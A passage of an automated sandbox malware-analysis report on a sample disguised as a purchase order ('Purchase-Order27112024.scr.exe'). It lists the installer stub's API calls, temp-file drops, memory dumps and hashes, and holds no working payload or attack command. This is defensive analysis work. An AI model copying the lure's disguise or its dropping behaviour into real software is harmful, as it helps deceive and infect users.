                                                                                                      • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
                                                                                                      • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405DCF
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 00405DD6
                                                                                                        • Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 00405BB8
                                                                                                        • Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                                                                      • String ID: %ls=%ls$NUL$[Rename]
                                                                                                      • API String ID: 1265525490-899692902
                                                                                                      • Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                                                                      • Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
                                                                                                      • Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
                                                                                                      • Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D
                                                                                                      APIs
                                                                                                      • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                      • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                      • DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                      • String ID: F
                                                                                                      • API String ID: 941294808-1304234792
                                                                                                      • Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                      • Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
                                                                                                      • Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
                                                                                                      • Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5
                                                                                                      APIs
                                                                                                      • CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 0040623F
                                                                                                      • CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                                                                      • CharNextW.USER32(?,"C:\Users\user\Desktop\Purchase-Order27112024.scr.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406253
                                                                                                      • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,76233420,00403542), ref: 00406266
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Char$Next$Prev
                                                                                                      • String ID: "C:\Users\user\Desktop\Purchase-Order27112024.scr.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 589700163-3339399756
                                                                                                      • Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                                                      • Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
                                                                                                      • Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
                                                                                                      • Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD
                                                                                                      APIs
                                                                                                      • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
                                                                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
                                                                                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharFileMultiWideWritelstrlen
                                                                                                      • String ID: 8$C:\Users\user\AppData\Local\Temp\nsl791D.tmp$C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll
                                                                                                      • API String ID: 1453599865-3361959198
                                                                                                      • Opcode ID: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                                                                      • Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
                                                                                                      • Opcode Fuzzy Hash: 2ec4215e9db0db2254814e3cb73373e62eff586f0bef32dca1f3cc9ac902e013
                                                                                                      • Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(?,000000EB), ref: 0040421E
                                                                                                      • GetSysColor.USER32(00000000), ref: 0040423A
                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404246
                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404252
                                                                                                      • GetSysColor.USER32(?), ref: 00404265
                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404275
                                                                                                      • DeleteObject.GDI32(?), ref: 0040428F
                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404299
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 2320649405-0
                                                                                                      • Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                      • Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
                                                                                                      • Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
                                                                                                      • Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
                                                                                                      • GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
                                                                                                      • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00402877
                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
                                                                                                      • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                      • String ID:
                                                                                                      • API String ID: 3294113728-0
                                                                                                      • Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                                                                      • Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
                                                                                                      • Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
                                                                                                      • Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9
                                                                                                      APIs
                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402D35
                                                                                                      • GetTickCount.KERNEL32 ref: 00402D53
                                                                                                      • wsprintfW.USER32 ref: 00402D81
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                      • CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402DB3
                                                                                                        • Part of subcall function 00402CFE: MulDiv.KERNEL32(00010000,00000064,00015210), ref: 00402D13
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                      • String ID: ... %d%%
                                                                                                      • API String ID: 722711167-2449383134
                                                                                                      • Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                                                                      • Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
                                                                                                      • Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
                                                                                                      • Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE
                                                                                                      APIs
                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
                                                                                                      • GetMessagePos.USER32 ref: 00404ADF
                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404AF9
                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
                                                                                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                      • String ID: f
                                                                                                      • API String ID: 41195575-1993550816
                                                                                                      • Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                      • Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
                                                                                                      • Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
                                                                                                      • Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
                                                                                                      • wsprintfW.USER32 ref: 00402CD1
                                                                                                      • SetWindowTextW.USER32(?,?), ref: 00402CE1
                                                                                                      • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                      • API String ID: 1451636040-1158693248
                                                                                                      • Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                                                      • Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
                                                                                                      • Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
                                                                                                      • Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59
                                                                                                      APIs
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 10002416
                                                                                                        • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                                                                      • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
                                                                                                      • String ID:
                                                                                                      • API String ID: 4216380887-0
                                                                                                      • Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                      • Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
                                                                                                      • Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
                                                                                                      • Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61
                                                                                                      APIs
                                                                                                        • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                      • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1780285237-0
                                                                                                      • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                      • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                      • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                      • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
                                                                                                      • wsprintfW.USER32 ref: 00404A70
                                                                                                      • SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
